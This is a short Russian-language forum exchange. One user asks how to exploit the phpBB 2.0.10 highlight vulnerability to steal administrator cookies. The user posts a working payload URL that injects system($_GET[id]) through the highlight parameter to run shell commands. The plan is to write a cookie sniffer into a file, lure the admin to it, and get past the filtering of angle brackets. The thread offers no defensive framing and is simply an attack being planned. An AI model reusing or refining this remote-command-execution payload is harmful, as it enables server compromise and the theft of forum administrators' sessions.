Можно ли как-нить с помошью последней уязвимости в phpBB(2.0.10) использовать xss и получить админские куки?
Я пробовал так:
viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo test!!! и
с обычным текстом все получалось, а вот если вставить например <img src="">, то уже ниче не пишется :(

Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!

Ну и увидишь это только ты! Смысл то какой?! Echo ничего не даст!
:) Я немного не так написал:
viewtopic.php?t=6&highlight=%2527.system($_GET[id]).%2527&id=echo 'test!!!' >> 1.htm
Так я думаю моя идея понятна: Записываем снифер в файл 1.htm, а потом травим адина на эту "Новогоднюю Страничку" :)
Вопрос в том, почему не пропускаются символы <>.